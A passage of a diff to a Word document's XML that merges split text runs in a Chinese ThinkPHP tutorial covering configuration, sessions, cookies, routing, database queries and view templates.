-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>::parse(APP_PATH.'my_config.</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>ini</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>','</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>ini</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>');</w:t>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Config::parse(APP_PATH.'my_config.ini','ini');</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:firstLineChars="250" w:firstLine="525"/>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>Config</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>::parse(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>APP_PATH.'my_config.xml','xml</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>');</w:t>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Config::parse(APP_PATH.'my_config.xml','xml');</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3349,23 +3084,7 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">echo </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>Config</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>::get('</w:t>
+              <w:t>echo Config::get('</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3445,21 +3164,12 @@
               </w:rPr>
               <w:t xml:space="preserve">    </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>Config</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>::set('</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Config::set('</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4003,21 +3713,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>Session::</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>init</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>([</w:t>
+              <w:t>Session::init([</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4074,21 +3770,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">      '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>auto_start</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>'     =&gt; true, //</w:t>
+              <w:t xml:space="preserve">      'auto_start'     =&gt; true, //</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4136,21 +3818,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>Session::set('name','</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>thinkphp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>',</w:t>
+              <w:t>Session::set('name','thinkphp',</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4599,15 +4267,7 @@
               <w:ind w:firstLineChars="150" w:firstLine="315"/>
             </w:pPr>
             <w:r>
-              <w:t>Cookie::</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>init</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>(</w:t>
+              <w:t>Cookie::init(</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4670,11 +4330,9 @@
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>Set,get,delete,clear</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -4813,11 +4471,9 @@
             <w:r>
               <w:t>需要在</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>config.php</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -4865,21 +4521,7 @@
                     <w:rPr>
                       <w:color w:val="0070C0"/>
                     </w:rPr>
-                    <w:t>'</w:t>
-                  </w:r>
-                  <w:proofErr w:type="spellStart"/>
-                  <w:r>
-                    <w:rPr>
-                      <w:color w:val="0070C0"/>
-                    </w:rPr>
-                    <w:t>url_route_on</w:t>
-                  </w:r>
-                  <w:proofErr w:type="spellEnd"/>
-                  <w:r>
-                    <w:rPr>
-                      <w:color w:val="0070C0"/>
-                    </w:rPr>
-                    <w:t>'  =&gt;  true,</w:t>
+                    <w:t>'url_route_on'  =&gt;  true,</w:t>
                   </w:r>
                 </w:p>
                 <w:p>
@@ -4887,21 +4529,7 @@
                     <w:rPr>
                       <w:color w:val="0070C0"/>
                     </w:rPr>
-                    <w:t>'</w:t>
-                  </w:r>
-                  <w:proofErr w:type="spellStart"/>
-                  <w:r>
-                    <w:rPr>
-                      <w:color w:val="0070C0"/>
-                    </w:rPr>
-                    <w:t>url_route_must</w:t>
-                  </w:r>
-                  <w:proofErr w:type="spellEnd"/>
-                  <w:r>
-                    <w:rPr>
-                      <w:color w:val="0070C0"/>
-                    </w:rPr>
-                    <w:t>'=&gt;  false,</w:t>
+                    <w:t>'url_route_must'=&gt;  false,</w:t>
                   </w:r>
                 </w:p>
               </w:tc>
@@ -4930,21 +4558,7 @@
                     <w:rPr>
                       <w:color w:val="0070C0"/>
                     </w:rPr>
-                    <w:t>'</w:t>
-                  </w:r>
-                  <w:proofErr w:type="spellStart"/>
-                  <w:r>
-                    <w:rPr>
-                      <w:color w:val="0070C0"/>
-                    </w:rPr>
-                    <w:t>url_route_on</w:t>
-                  </w:r>
-                  <w:proofErr w:type="spellEnd"/>
-                  <w:r>
-                    <w:rPr>
-                      <w:color w:val="0070C0"/>
-                    </w:rPr>
-                    <w:t>'  =&gt;  true,</w:t>
+                    <w:t>'url_route_on'  =&gt;  true,</w:t>
                   </w:r>
                 </w:p>
                 <w:p>
@@ -4952,21 +4566,7 @@
                     <w:rPr>
                       <w:color w:val="0070C0"/>
                     </w:rPr>
-                    <w:t>'</w:t>
-                  </w:r>
-                  <w:proofErr w:type="spellStart"/>
-                  <w:r>
-                    <w:rPr>
-                      <w:color w:val="0070C0"/>
-                    </w:rPr>
-                    <w:t>url_route_must</w:t>
-                  </w:r>
-                  <w:proofErr w:type="spellEnd"/>
-                  <w:r>
-                    <w:rPr>
-                      <w:color w:val="0070C0"/>
-                    </w:rPr>
-                    <w:t>'=&gt;  true,</w:t>
+                    <w:t>'url_route_must'=&gt;  true,</w:t>
                   </w:r>
                 </w:p>
               </w:tc>
@@ -5006,7 +4606,6 @@
             <w:r>
               <w:t>方法类型有</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -5014,11 +4613,7 @@
               <w:t>get</w:t>
             </w:r>
             <w:r>
-              <w:t>,post,put,delete</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>,*</w:t>
+              <w:t>,post,put,delete,*</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5029,35 +4624,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>Route::register('new/:</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>id','New</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>update','POST</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>'); //</w:t>
+              <w:t>Route::register('new/:id','New/update','POST'); //</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5383,11 +4950,9 @@
             <w:r>
               <w:t>）路由配置文件：</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>route.php</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -5428,21 +4993,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">    'blog/:id'   =&gt; ['Blog/update',['method' =&gt; '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>post|put</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>'], ['id' =&gt; '\d+']],</w:t>
+              <w:t xml:space="preserve">    'blog/:id'   =&gt; ['Blog/update',['method' =&gt; 'post|put'], ['id' =&gt; '\d+']],</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5493,21 +5044,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>Route::get('hello/:</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>name',function</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">($name){ </w:t>
+              <w:t xml:space="preserve">Route::get('hello/:name',function($name){ </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5532,21 +5069,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>return '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>Hello,'.$name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>;</w:t>
+              <w:t>return 'Hello,'.$name;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5693,21 +5216,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>'blog/:id'   =&gt; ['Blog/update',['method' =&gt; '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>post|put</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>'], [</w:t>
+              <w:t>'blog/:id'   =&gt; ['Blog/update',['method' =&gt; 'post|put'], [</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5870,7 +5379,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>C</w:t>
             </w:r>
@@ -5881,35 +5389,16 @@
               <w:t>onfig</w:t>
             </w:r>
             <w:r>
-              <w:t>.php</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">:   </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>'</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>url_domain_deploy</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>' =&gt;  true</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
+              <w:t xml:space="preserve">.php:   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'url_domain_deploy' =&gt;  true</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
             <w:r>
               <w:t>R</w:t>
             </w:r>
@@ -5920,11 +5409,7 @@
               <w:t>oute.</w:t>
             </w:r>
             <w:r>
-              <w:t>php</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>:</w:t>
+              <w:t>php:</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6387,25 +5872,7 @@
                 <w:color w:val="0070C0"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>","</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>shidandan</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>");//</w:t>
+              <w:t>","shidandan");//</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6560,11 +6027,9 @@
             <w:r>
               <w:t>：</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>url</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>为不存在的操作时调用</w:t>
             </w:r>
@@ -6668,11 +6133,9 @@
             <w:r>
               <w:t>名可以</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>config</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>中修改</w:t>
             </w:r>
@@ -6862,14 +6325,12 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>ThinkPHP</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -6882,11 +6343,9 @@
               </w:rPr>
               <w:t>在</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>database.php</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -6909,7 +6368,6 @@
               </w:rPr>
               <w:t>公共的</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -6917,7 +6375,6 @@
               </w:rPr>
               <w:t>Db</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -6999,71 +6456,21 @@
                 <w:sz w:val="20"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-                <w:sz w:val="20"/>
-              </w:rPr>
-              <w:t>Db</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-                <w:sz w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">::query('select * from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-                <w:sz w:val="20"/>
-              </w:rPr>
-              <w:t>think_user</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-                <w:sz w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> where id=?',[8]);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-                <w:sz w:val="20"/>
-              </w:rPr>
-              <w:t>Db</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-                <w:sz w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">::execute('insert into </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-                <w:sz w:val="20"/>
-              </w:rPr>
-              <w:t>think_user</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-                <w:sz w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> (id, name) values (?, ?)',[8,'thinkphp']);</w:t>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>Db::query('select * from think_user where id=?',[8]);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>Db::execute('insert into think_user (id, name) values (?, ?)',[8,'thinkphp']);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -7467,21 +6874,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>return $view-&gt;fetch('hello',['name'=&gt;'</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>thinkphp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>']);</w:t>
+              <w:t>return $view-&gt;fetch('hello',['name'=&gt;'thinkphp']);</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7618,21 +7011,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>return $view-&gt;show($content,$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>vars</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>);</w:t>
+              <w:t>return $view-&gt;show($content,$vars);</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7843,293 +7222,261 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">    'name'=&gt;'</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
+              <w:t xml:space="preserve">    'name'=&gt;'ThinkPHP',</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    'email'=&gt;'thinkphp@qq.com'</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    ]);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>模板输出</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>return $view-&gt;fetch('index');</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t>view</w:t>
+            </w:r>
+            <w:r>
+              <w:t>对象直接赋值</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>实例化视图类</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$view = new \think\View();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$view-&gt;name =   'ThinkPHP';</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$view-&gt;email=   'thinkphp@qq.com';</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>模板输出</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>return $view-&gt;fetch('index');</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>模板</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>ThinkPHP</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>',</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:leftChars="200" w:left="420"/>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    'email'=&gt;'thinkphp@qq.com'</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:leftChars="200" w:left="420"/>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    ]);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:leftChars="200" w:left="420"/>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> // </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>模板输出</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:leftChars="200" w:left="420"/>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>return $view-&gt;fetch('index');</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
